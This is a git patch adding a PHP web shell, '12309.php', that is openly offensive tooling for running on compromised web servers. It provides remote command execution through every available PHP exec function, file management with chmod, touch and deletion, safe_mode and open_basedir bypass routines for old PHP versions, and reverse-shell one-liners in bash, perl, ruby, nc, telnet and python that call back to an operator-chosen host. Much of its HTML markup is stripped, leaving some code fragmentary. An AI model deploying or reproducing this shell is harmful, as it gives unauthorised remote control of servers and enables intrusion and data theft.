From 8cfa36ee9dcacb21eb12893ce940ddcc88f5d4d3 Mon Sep 17 00:00:00 2001
From: Ario
Date: Sun, 18 May 2014 22:24:07 +0800
Subject: [PATCH] add 12309.php
---
 php/12309.php | 2066 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 2066 insertions(+)
 create mode 100644 php/12309.php
diff --git a/php/12309.php b/php/12309.php
new file mode 100644
index 00000000..3b50853f
--- /dev/null
+++ b/php/12309.php
@@ -0,0 +1,2066 @@ +'; +$htaccesses=array('cgi' => "Options +Indexes +FollowSymLinks +ExecCGI\nAddType application/x-httpd-cgi .pl .py", 'ssi' => "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml\nAddOutputFilter INCLUDES .shtml"); +if($_POST['action']!="") { + $_SESSION['action']=$_POST['action']; + $action=$_SESSION['action']; +} else { + $action="viewer"; +} +// download file or command execution result +if($action=="download" or $_POST["down"]=="on") { + $download="1"; +} +if ($download == "1") { + if (isset($_POST["file"])) { + header('Content-Length:'.filesize($_POST["file"]).''); + } + header("Content-Type: application/force-download"); + header("Content-Type: application/octet-stream"); + header("Accept-Ranges: bytes"); + if (isset($_POST["filename"])) { + header('Content-Disposition: attachment; filename="'.$_POST["filename"].'"'); + } elseif (isset($_POST["file"])) { + header('Content-Disposition: attachment; filename="'.$_POST["file"].'"'); + } else { + header('Content-Disposition: attachment; filename="result.txt"'); + } +} +@set_magic_quotes_runtime(0); +@ini_set("magic_quotes_runtime", 0); +// slashes fix by r00nix +if (get_magic_quotes_gpc()) { + function stripslashes_deep($value) { + $value = is_array($value) ? 
+ array_map('stripslashes_deep', $value) :
+ stripslashes($value);
+ return $value;
+ }
+ $_POST = array_map('stripslashes_deep', $_POST);
+ $_GET = array_map('stripslashes_deep', $_GET);
+ $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
+ $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
+}
+$descriptorspec = array(
+ 0 => array("pipe", "r"),
+ 1 => array("pipe", "w"),
+ 2 => array("pipe", "w")
+);
+$helpscript='function showTooltip(id)
+{
+ var myDiv = document.getElementById(id);
+ if(myDiv.style.display == "none"){
+ myDiv.style.display = "block";
+ } else {
+ myDiv.style.display = "none";
+ }
+ return false;
+}';
+$resizescript='function changeSize(elem){
+ if(event.keyCode==13){
+ elem.rows = elem.rows+1;
+ }
+ var oldrows = getrows(elem);
+ var myTxtAreaSize = elem.value.length;
+ var newrows = (myTxtAreaSize / 80 | 0)+1;
+ if(newrows>oldrows){
+ elem.rows = newrows;
+ } else {
+ elem.rows = oldrows;
+ }
+}
+function getrows(elem){
+ var text = elem.value.replace(/\s+$/g, "\n");
+ var aNewlines = text.split("\n");
+ var iNewlineCount = aNewlines.length;
+ return iNewlineCount;
+}';
+$design='function cleard() {
+ document.cookie="d=c; path=/;";
+ window.location.reload();
+}
+function blackd() {
+ document.cookie="d=b; path=/;";
+ window.location.reload();
+}';
+if ($_COOKIE['d'] != "c") {
+ $style='';
+} else {
+ $style='';
+}
+if ($_COOKIE['d'] == "c") {
+ $button='

'; + } else { + $button='

'; +} +$title=' + + + + 12309 '.$ver.' + '.$style.'
file operations || execute command || bind/backconnect || extras
'.$button.'';
+// --------------------------------------------- symbolic permissions
+function fperms($file,$request) {
+ $perms = fileperms($file);
+ if (($perms & 0xC000) == 0xC000) {$info = 's';}
+ elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
+ elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
+ elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
+ elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
+ elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
+ elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
+ else {$info = '?';}
+ if ($request == "string") {
+ $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 
'T' : '-')); + return $info; + } elseif ($request == "array") { + $o["r"] = ($perms & 00400) > 0; $o["w"] = ($perms & 00200) > 0; $o["x"] = ($perms & 00100) > 0; + $g["r"] = ($perms & 00040) > 0; $g["w"] = ($perms & 00020) > 0; $g["x"] = ($perms & 00010) > 0; + $w["r"] = ($perms & 00004) > 0; $w["w"] = ($perms & 00002) > 0; $w["x"] = ($perms & 00001) > 0; + return array("t"=>$info,"o"=>$o,"g"=>$g,"w"=>$w); + } else { + return "request?"; + } +} +function view_perms_color($file) { + if (!is_readable($file)) { + return "".fperms($file,"string").""; + } elseif (!is_writable($file)) { + return "".fperms($file,"string").""; + } else { + return "".fperms($file,"string").""; + } +} +// --------------------------------------------- touch file +function touchz($file) { + $form=TRUE; + if (isset($_POST["touch_submit"])) { + $date=explode(" ",$_POST["time"]); + $day=explode("-",$date[0]); + $time=explode(":",$date[1]); + $unixtime=mktime($time[0],$time[1],$time[2],$day[1],$day[2],$day[0]); + if (touch($file,$unixtime,$unixtime)) { + $form = FALSE; + echo "
touched ".$file." to ".$unixtime." (".$_POST["time"].") back

"; + } else { + echo "
can't touch to ".$unixtime." (".$_POST["time"].")! back

"; + } + } + if ($form) { + echo "
+ + + + + touch ".$file." to: + +
"; + } + return TRUE; +} +// --------------------------------------------- chmod code from c99 shell, updated by 12309 +function chmodz($file) { + $check = fileperms($file); + if (!$check) {echo "chmod error: can`t get current value!";} + else { + $form=TRUE; + if (isset($_POST["chmod_submit"])) { + $chmod_o=$_POST["chmod_o"]; + $chmod_g=$_POST["chmod_g"]; + $chmod_w=$_POST["chmod_w"]; + $octet=trim("0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8)); + if (chmod($file,octdec($octet))) { + $form = FALSE; + echo "chmoded ".$file." to ".$octet."! back

"; + } else { + echo "can't chmod to ".$octet."! back

"; + } + } + if (isset($_POST["chmod_string"])) { + if (chmod($file,octdec($_POST["string"]))) { + $form = FALSE; + echo "chmoded ".$file." to ".$_POST["string"]."! back

"; + } else { + echo "can't chmod to ".$_POST["string"]."! back

"; + } + } + if ($form) { + $perms = fperms($file,"array"); + echo "
chmoding ".$file.": ".view_perms_color($file)." (".substr(decoct($check),-4,4).") owned by:
".owner($file)."
+
input string:
+ + + + + +
"; + echo "
or select checkboxes:
+ + + + + + + + + + + +
Owner
+ read
+ write
+ execute +
Group
+ read
+ write
+ execute +
World
+ read
+ write
+ execute +
"; + } + } + return TRUE; +} +// --------------------------------------------- clearing phpversion() +function version() { + $pv=explode(".",phpversion()); + if(eregi("-",$pv[2])) { + $tmp=explode("-",$pv[2]); + $pv[2]=$tmp[0]; + } + $php_version_sort=$pv[0].".".$pv[1].".".$pv[2]; + return $php_version_sort; +} +// --------------------------------------------- recursive dir removal by Endeveit +function rmrf($dir) +{ + if ($objs = glob($dir."/*")) { + foreach($objs as $obj) { + is_dir($obj) ? rmrf($obj) : unlink($obj); + } + } + if (rmdir($dir)) { + return TRUE; + } else { + return FALSE; + } +} +// --------------------------------------------- checking for enabled funcs +function function_enabled($func) { + $disabled=explode(",",@ini_get("disable_functions")); + if (empty($disabled)) { + $disabled=array(); + } + else { + $disabled=array_map('trim',array_map('strtolower',$disabled)); + } + return (function_exists($func) && is_callable($func) && !in_array($func,$disabled) ); +} +if (!function_enabled('shell_exec') and !function_enabled('proc_open') and !function_enabled('passthru') and !function_enabled('system') and !function_enabled('exec') and !function_enabled('popen')) { + $failflag="1"; +} else { + $failflag="0"; +} +// -------------------------------------------- run command +function run($c) { + if (function_enabled('shell_exec')) { + shell_exec($c); + } else if(function_enabled('system')) { + system($c); + } else if(function_enabled('passthru')) { + passthru($c); + } else if(function_enabled('exec')) { + exec($c); + } else if(function_enabled('popen')) { + $fp=popen($c,'r'); + @pclose($fp); + } else if(function_enabled('proc_open')) { + $handle=proc_open($c,$GLOBALS["descriptorspec"],$pipes); + while (!feof($pipes[1])) { + $buffer.=fread($pipes[1],1024); + } + @proc_close($handle); + } +} +// -------------------------------------------- php <= 5.2.9 curl bug +function sploent529($path) { + if (!is_dir('file:')) { + mkdir('file:'); + } + $dirz=array(); + 
$a=array(); + $a=explode('/',$path); + $c=count($a); + $dir='file:/'; + $d=substr($dir,0,-1); + if (!is_dir($d)) { + mkdir($d); + } + for ($i=0;$i<$c-1;++$i) { + $dir.=$a[$i].'/'; + $d=substr($dir,0,-1); + $dirz[]=$d; + if (!is_dir($d)) { + mkdir($d); + } + } + if (!file_exists($path)) { + $fp=fopen('file:/'.$path,'w'); + fclose($fp); + } + $ch=curl_init(); + curl_setopt($ch,CURLOPT_URL,'file:file:////'.$path); + curl_setopt($ch,CURLOPT_HEADER,0); + if(FALSE==curl_exec($ch)) { + echo (" fail :( either there is no such file or exploit failed "); + curl_close($ch); + rmrf('file:'); + echo $pageend; + die(); + } else { + curl_close($ch); + rmrf('file:'); + return TRUE; + } +} +// --------------------------------------------- php 5.1.6 ini_set bug +function sploent516() { + //safe_mode check + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + ini_restore("safe_mode"); + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + ini_set("safe_mode", FALSE); + ini_set("safe_mode", "Off"); + ini_set("safe_mode", "0"); + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + echo "safe mode: ON
"; + } else { + echo "safe mode: OFF || hello php-5.1.6 bugs
"; + } + } else { + echo "safe mode: OFF || hello php-5.1.6 bugs
"; + } + } else { + echo "safe mode: OFF
"; + } + //open_basedir check + if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { + echo "open_basedir: none
"; + } + else { + ini_restore("open_basedir"); + if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { + echo "open_basedir: none || hello php-5.1.6 bugs
"; + } + else { + ini_set('open_basedir', '/'); + if (ini_get("open_basedir")=="/") { + echo "open_basedir: / || hello php-5.1.6 bugs
"; + } + else { + $basedir=TRUE; + echo "open_basedir: ".ini_get("open_basedir"); + } + } + } +} +// --------------------------------------------- findsock +function findsock($path) { + $VERSION = "1.0"; + echo "findsock start\n "; + $c="".$path." ".$_SERVER['REMOTE_ADDR']." ".$_SERVER['REMOTE_PORT'].""; + run($c); + echo " exiting\n"; + exit(); +} +// --------------------------------------------- search for binary +function search($bin,$flag) { + if ($flag=="1") { + $path=""; + return $path; + } else { + if (function_enabled('shell_exec')) { + $path=trim(shell_exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); + } else if(function_enabled('exec')) { + $path=trim(exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); + } else if(function_enabled('system')) { + ob_start(); + system('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); + $path=trim(ob_get_contents()); + ob_end_clean(); + } else if (function_enabled('popen')) { + $hndl=popen('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in', "r"); + $path=trim(stream_get_contents($hndl)); + pclose($hndl); + } else if(function_enabled('passthru')) { + ob_start(); + passthru('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); + $path=trim(ob_get_contents()); + ob_end_clean(); + } else if(function_enabled('proc_open')) { + $c='export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin && which '.$bin.' 
2>&1 | grep -v no.'.$bin.'.in'; + $process = proc_open('/bin/sh', $GLOBALS["descriptorspec"], $pipes); + if (is_resource($process)) { + fwrite($pipes[0],$c); + fclose($pipes[0]); + $path=trim(stream_get_contents($pipes[1])); + fclose($pipes[1]); + fclose($pipes[2]); + @proc_close($process); + } + } + } + return $path; +} +// --------------------------------------------- filemanager code by Grinay, updated by 12309 +function owner($path) { + $user=fileowner($path); + $group=filegroup($path); + $data=$user; + if(function_enabled('posix_getpwuid')) { + $u=posix_getpwuid($user); + $data.=" (".$u["name"].")"; + } + $data.="
".$group; + if(function_enabled('posix_getgrgid')) { + $g=posix_getgrgid($group); + $data.=" (".$g["name"].") "; + } + return $data; +} +function view_size($size) { + if ($size>=1073741824) { $size=@round($size/1073741824*100)/100 ." GB"; } + elseif ($size>=1048576) { $size=$size." B
".@round($size/1048576*100)/100 ." MB"; } + elseif ($size>=1024) { $size=$size." B
".@round($size/1024*100)/100 ." KB"; } + else { $size=$size ." B"; } + return $size; +} +function dirsize($path) { + $totalsize=0; + if ($handle=opendir($path)) { + while (false !== ($file = readdir($handle))) { + $nextpath=$path . '/' . $file; + if ($file!='.' && $file != '..' && !is_link ($nextpath)) { + if (is_dir($nextpath)) { + $result=dirsize($nextpath); + $totalsize+=$result['size']; + } elseif (is_file($nextpath)) { + $totalsize+=filesize($nextpath); + } + } + } + } + closedir ($handle); + return $totalsize; +} +function scandire($dir) { + if (empty($dir)) { $dir=getcwd(); } + $dir=chdir($dir) or die('cannot chdir! open_basedir/safe_mode on?

'.$pageend.''); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir.$file)=="dir") $dire[]=$file; + if(filetype($dir.$file)=="file" || filetype($dir.$file)=="link" || filetype($dir.$file)=="socket") $files[]=$file; + // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns "" + // if(filetype($dir.$file)=="link") $files[]=$file; + // echo "file = ".$file." (".filetype($file).")
"; #debug + // if (is_link($file)) { echo " -> ".readlink($file); }; #debug + } + closedir($dh); + @sort($dire); + @sort($files); + echo ""; + echo ''; + echo ""; + for($i=0;$i'; + } + for($i=0;$i'; + } + echo "
go to dir:
NameTypeSizeInode Changed
File Modified
File Accessed
Owner
Group
ChmodAction
'.$dire[$i].'Dir'.view_size(dirsize($link)).''.date("d/m/Y H:i:s",filectime($link)).'
'.date("d/m/Y H:i:s",filemtime($link)).'
'.date("d/m/Y H:i:s",fileatime($link)).'
'.owner($link).''.substr(sprintf('%o',fileperms($link)), -4).'
('.view_perms_color($link,"string").')
x C T
'.$files[$i].''; + echo '
File'.view_size(filesize($linkfile)).''.date("d/m/Y H:i:s",filectime($linkfile)).'
'.date("d/m/Y H:i:s",filemtime($linkfile)).'
'.date("d/m/Y H:i:s",fileatime($linkfile)).'
'.owner($linkfile).''.substr(sprintf('%o',fileperms($linkfile)), -4).'
('.view_perms_color($linkfile,"string").')
D E x C T
"; + } + } +} +// --------------------------------------------- crypt functions by Eugen +function entityenc($str) { + $text_array=explode("\r\n", chunk_split($str, 1)); + for ($n=0; $n < count($text_array) - 1; $n++) { + $newstring .= "&#" . ord($text_array[$n]) . ";"; + } + return $newstring; +} +function entitydec($str) { + $str=str_replace(';', '; ', $str); + $text_array=explode(' ', $str); + for ($n=0; $n < count($text_array) - 1; $n++) { + $newstring .= chr(substr($text_array[$n], 2, 3)); + } + return $newstring; +} +function asc2hex($str) { + return chunk_split(bin2hex($str), 2, " "); +} +function hex2asc($str) { + $str=str_replace(" ", "", $str); + for ($n=0; $n>6) & 0x3f}; + ++$i; + if ($i >= $count) break; + if ($i < $count) $value |= (ord($input[$i]) << 16); + $output .= $itoa64{($value>>12) & 0x3f}; + ++$i; + if ($i >= $count) break; + $output .= $itoa64{($value>>18) & 0x3f}; + } + return $output; +} +function to64na($value,$num) { + global $itoa64; + $output = ''; + while ($num-1 >= 0) { + --$num; + $output .= $itoa64{$value & 0x3f}; + $value >>= 6; + } + return $output; +} +function unap($pwd,$salt,$magic='$1$') { + if (substr($salt,0,strlen($magic)) == $magic) $salt = substr($salt,strlen($magic)); + $salt = explode('$',$salt,1); + $salt = substr($salt[0],0,8); + $ctx = $pwd.$magic.$salt; + $final = md5($pwd.$salt.$pwd,true); + for ($pl=strlen($pwd);$pl>=0;$pl-=16) { + $ctx .= substr($final,0,($pl>16?16:$pl)); + } + $i = strlen($pwd); + while ($i) { + $ctx .= ($i&1?chr(0):$pwd{0}); + $i >>= 1; + } + $final = md5($ctx,true); + for ($i=0;$i<1000;++$i) { + $ctx1 = ''; + $ctx1 .= ($i&1?$pwd:substr($final,0,16)); + if ($i % 3) $ctx1 .= $salt; + if ($i % 7) $ctx1 .= $pwd; + $ctx1 .= ($i&1?substr($final,0,16):$pwd); + $final = md5($ctx1,true); + } + $passwd = ''; + $passwd .= to64na(((int)ord($final{0}) << 16)|((int)ord($final{6}) << 8)|((int)ord($final{12})),4); + $passwd .= to64na(((int)ord($final{1}) << 16)|((int)ord($final{7}) << 
8)|((int)ord($final{13})),4); + $passwd .= to64na(((int)ord($final{2}) << 16)|((int)ord($final{8}) << 8)|((int)ord($final{14})),4); + $passwd .= to64na(((int)ord($final{3}) << 16)|((int)ord($final{9}) << 8)|((int)ord($final{15})),4); + $passwd .= to64na(((int)ord($final{4}) << 16)|((int)ord($final{10}) << 8)|((int)ord($final{5})),4); + $passwd .= to64na(((int)ord($final{11})),2); + return $magic.$salt.'$'.$passwd; +} +function phpass($pwd,$salt,$count,$prefix) { + $hash = md5($salt.$pwd,true); + for ($i=0;$i<$count;++$i) { + $hash = md5($hash.$pwd,true); + } + return $prefix.substr($salt,0,8).to64as($hash,16); +} +function genSalt($salt,$length=8,$dot=0) { + if (strlen($salt)>=$length) return substr($salt,0,$length); + global $itoa64; + if (!$dot) { $alphabet=substr($itoa64,2); } else { $alphabet=$itoa64; } + $output=''; + for ($i=0;$i<$length;++$i) $output.=$alphabet{mt_rand(0,strlen($alphabet)-1)}; + return $output; +} +function mysql4($pwd) { + $nr = 0x50305735; + $nr2 = 0x12345671; + $add = 7; + $charArr = str_split($pwd); + foreach ($charArr as $char) { + if (in_array($char,array(' ','\n'))) continue; + $charVal = ord($char); + $nr ^= ((($nr & 63)+$add) * $charVal)+($nr << 8); + $nr &= 0x7fffffff; + $nr2 += ($nr2 << 8) ^ $nr; + $nr2 &= 0x7fffffff; + $add += $charVal; + } + return sprintf('%08x%08x',$nr,$nr2); +} +// --------------------------------------------- main code +if (!isset($_REQUEST['p'])) { $_REQUEST['p']="s"; } +switch ($_REQUEST['p']) { + case "s": + if (empty($_POST["wut"]) and $download != "1") { + echo $title; + sploent516(); + if (ini_get("safe_mode")) { + $failflag="1"; + } + $shelltext=("uname -a"); + echo '
+ haxor@pwnedbox$ download

'; + if ($failflag=="1") { + echo "all system functions are disabled :( but you could try a CGI/SSI shell ;) and still there is
"; } else { + if (function_enabled('passthru')) { + echo 'passthru
'; + } else { echo 'passthru is disabled!
';} + if (function_enabled('system')) { + echo 'system
'; + } else { echo 'system is disabled!
';} + if (function_enabled('exec')) { + echo 'exec
'; + } else { echo 'exec is disabled!
';} + if (function_enabled('shell_exec')) { + echo 'shell_exec
'; + } else { echo 'shell_exec is disabled!
';} + if (function_enabled('popen')) { + echo 'popen
'; + } else { echo 'popen is disabled!
';} + if (function_enabled('proc_open')) { + echo 'proc_open
'; + } else { echo 'proc_open is disabled!
';} + } + // eval almost always enabled, except there is special option in suhosin-patched php + echo 'php eval()
'; + echo '
'; + echo "
pcntl_exec:"; + //determining if pcntl enabled is kinda tricky. debug: add if(dl('pcntl.so')) or check var_dump(get_extension_funcs('pcntl')) ? + if (extension_loaded('pcntl')) { + if (function_enabled('pcntl_fork')) { + if (function_enabled('pcntl_exec')) { + echo '
interpreter
haxor@pwnedbox$ > >> '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
delete result file after showing contents download
'; + } else { + echo "
pcntl_exec is disabled!
"; + } + } else { + echo "
pcntl_fork is disabled!
"; + } + } else { + echo "
fail, no pcntl.so here
"; + } + echo "
ssh2_exec:"; + if (extension_loaded('ssh2')) { + if (function_enabled('ssh2_connect')) { + if (function_enabled('ssh2_exec')) { + if ($download != "1") { + if (empty($_POST["wut"])) { + echo '
host: port: user: password:
haxor@pwnedbox$ download
'; + } + } + } else { + echo "
ssh2_exec is disabled!"; + } + } else { + echo "
ssh2_connect is disabled!"; + } + } else { + echo "
fail, no ssh2.so here"; + } + echo $pageend; + } else { + if ($download != "1") { + echo $title; + } + $shelltext=$_POST["command"]; + $html='
haxor@pwnedbox$ '; + $input=' 2>&1 download
'; + break; + case "system": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'system">'; + break; + case "exec": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'exec">'; + break; + case "shell_exec": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'shell_exec">'; + break; + case "popen": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'popen">'; + break; + case "proc_open": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'proc_open">'; + break; + case "eval": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo 'php -r \''; echo ' \' + '; + break; + case "pcntl": + //sploent516 not needed coz pcntl bypasses safe_mode + echo '
interpreter
haxor@pwnedbox$ > >> '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
delete result file after showing contents download
'; + break; + case "ssh2": + echo '
host: port: user: password:
haxor@pwnedbox$ download
'; + break; + } + } + } + if (!empty($_POST["wut"])) { + if ($download != "1") { + echo ""; + } + } + break; +// --------------------------------------------- shell end; file operations + case "f": + if ($download != "1") { + echo $title; + echo ""; + echo "current dir: ".getcwd()."
"; + sploent516(); + echo "
--------------------------------
"; + } + if (empty($_POST["filer"]) and $download != "1" and empty($_POST["edt"]) and empty($_POST["sqlr"]) and empty($_POST["sqlu"]) and empty($_POST["upload"])) { + echo ' >> read/upload/edit file <<

+ ---> fail manager
'; + } + if ($action=="viewer") { + if (!isset($dir)) { + $dir=getcwd(); + } + scandire($_POST["dir"]); + } + if ($action=="download") { + readfile($_POST["file"]); + } + if ($action=="chmod") { + chmodz($_POST["file"]); + } + if ($action=="touch") { + touchz($_POST["file"]); + } + if ($action == 'delete') { + if (unlink($_POST["file"])) $content.="file ".$_POST["file"]." deleted, back"; + } + if ($action == 'deletedir') { + if (!rmrf($_POST["file"])) { + $content .="error deleting dir ".$_POST["file"].", back"; + } else { + $content .="dir ".$_POST["file"]." deleted, back"; + } + } + if (!empty($content)) { + echo $content; + } + if ($download != "1") { + echo '
'; + echo '
'; + echo $pageend; + } + break; +// --------------------------------------------- file operations end; bind + case "b": + echo $title; + echo ' >> help << +

'; + if ($failflag=="1") { + echo "fail, at least one system function needed!

"; + } else { + $nc='(dont forget to setup nc first!)'; + $semi='dont forget to write ; at the end of command!'; + sploent516(); + echo "
"; //debug: sometimes page cut here, when passthru system shell_exec are disabled + echo ' - - - - = = = = > > one-liners
>> show code << +
'; + echo '
backconnect to : using
'; + $searchvar=trim(search("bash",$failflag)); + if (empty($searchvar)) { + echo "fail, no bash here (lolwut?)
"; + } else { + echo ' bash
'; + } + $searchvar=trim(search("perl",$failflag)); + if (empty($searchvar)) { + echo "fail, no perl here
"; + } else { + echo ' perl
'; + } + $searchvar=trim(search("ruby",$failflag)); + if (empty($searchvar)) { + echo "fail, no ruby here
"; + } else { + echo ' ruby
'; + } + $searchvar=trim(search("nc",$failflag)); + if (empty($searchvar)) { + echo "fail, no nc here
"; + } else { + echo ' nc
'; + } + $searchvar=trim(search("telnet",$failflag)); + if (empty($searchvar)) { + echo "fail, no telnet here
"; + } else { + echo ' telnet
'; + } + $searchvar=trim(search("python",$failflag)); + if (empty($searchvar)) { + echo "fail, no python here
"; + } else { + echo ' python
'; + } + echo '

'; + if (!empty($_POST["oneline"])) { + switch ($_POST["wut"]) { + case "bash": + $c='0<&123;exec 123<>/dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].'; sh <&123 >&123 2>&123'; + run($c); + echo "done
"; + break; + case "perl": + $c='perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'.$_POST['ip'].':'.$_POST['port'].'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\''; + run($c); + echo "done
"; + break; + case "ruby": + $c='ruby -rsocket -e \'exit if fork;c=TCPSocket.new("'.$_POST['ip'].'","'.$_POST['port'].'");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\''; + run($c); + echo "done
"; + break; + case "nc": + $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && nc '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; + run($c); + echo "done
"; + break; + case "telnet": + $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && telnet '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; + run($c); + echo "done
"; + break; + case "python": + $c='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$_POST['ip'].'",'.$_POST['port'].'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''; + run($c); + echo "done
"; + break; + } + } + echo '- - - - = = = = > > classic
'; + echo '---> PHP
'; + if (!function_enabled('set_time_limit')) { echo 'warning! set_time_limit off!
'; } + if (!function_enabled('ignore_user_abort')) { echo 'warning! ignore_user_abort off!
'; } + echo '
bind local port
'.$semi.'
'; + if (function_enabled('fsockopen')) { + if (function_enabled('proc_open')) { + echo '
backconnect to :
'.$nc.'

'; + } else { echo 'fail, proc_open is needed for backconnect!

'; } + } else { echo 'fail, fsockopen is needed for backconnect!

'; } + //php end + echo '---> PERL
'; + $searchvar=trim(search("perl",$failflag)); + if (empty($searchvar)) { + echo "fail, no perl here
"; + } else { + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + } + //perl end + echo "
"; + echo '---> PYTHON
'; + $searchvar=trim(search("python",$failflag)); + if (empty($searchvar)) { + echo "fail, no python here
"; + } else { + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + echo '
fully interactive backconnect to : saving file to
'; + echo 'you need to run special client first: >> show code <<
with this one you will be able to run mc, top, vim, etc
+
'; + } + //python end + echo "
"; + echo '---> C
'; + $searchvar=trim(search("gcc",$failflag)); + if (empty($searchvar)) { + echo "fail, no gcc here
"; + } else { + echo 'don\'t remove ".c" file extension! compiler= '.$searchvar.'
'; + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + } + //c end + echo "
"; + echo '---> PHP+C findsock (likely wont work on modern php&apache >= 2009)
'; + $searchvar=trim(search("gcc",$failflag)); + if (empty($searchvar)) { + echo "fail, no gcc here
"; + } else { + echo '
compile findsock saving binary to: >> help << '; + echo '"; + echo '


